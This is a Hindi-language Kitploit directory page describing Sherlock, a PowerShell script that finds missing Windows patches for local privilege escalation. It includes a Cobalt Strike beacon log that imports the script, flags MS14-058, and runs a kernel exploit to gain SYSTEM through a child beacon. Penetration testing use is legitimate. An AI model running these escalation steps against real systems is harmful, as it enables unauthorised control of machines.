Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Sherlock — स्थानीय विशेषाधिकार वृद्धि कमजोरियों के लिए लापता सॉफ्टवेयर पैच को शीघ्रता से खोजने के लिए PowerShell स्क्रिप्ट। | Kitploit
उपकरण/GitHubGitHub/rasta-mouse/sherlock
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगArchived
GitHubrasta-mouse/sherlock

Sherlock

स्थानीय विशेषाधिकार वृद्धि कमजोरियों के लिए लापता सॉफ्टवेयर पैच को शीघ्रता से खोजने के लिए PowerShell स्क्रिप्ट।

रिपॉजिटरी देखें
2.0k4097 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

अप्रचलित। इसके बजाय Watson देखें।

Sherlock

स्थानीय विशेषाधिकार वृद्धि कमजोरियों के लिए लापता सॉफ़्टवेयर पैच को जल्दी से खोजने के लिए PowerShell स्क्रिप्ट।

वर्तमान में खोजता है:

  • MS10-015 : रिंग के लिए उपयोगकर्ता मोड (KiTrap0D)
  • MS10-092 : कार्य अनुसूचक
  • MS13-053 : NTUserMessageCall Win32k कर्नेल पूल ओवरफ़्लो
  • MS13-081 : TrackPopupMenuEx Win32k NULL पृष्ठ
  • MS14-058 : TrackPopupMenu Win32k नल पॉइंटर डीरेफरेंस
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : फ़ॉन्ट ड्राइवर बफ़र ओवरफ़्लो
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : द्वितीयक लॉगऑन हैंडल
  • MS16-034 : विंडोज कर्नेल-मोड ड्राइवर EoP
  • MS16-135 : Win32k विशेषाधिकार उन्नयन
  • CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 विशेषाधिकार वृद्धि

बुनियादी उपयोग:

root@kitploit:~
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-MS14058
[*] Tasked beacon to run: Find-MS14058
[+] host called home, sent: 20 bytes
[+] received output:

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
टूल डाउनलोड करें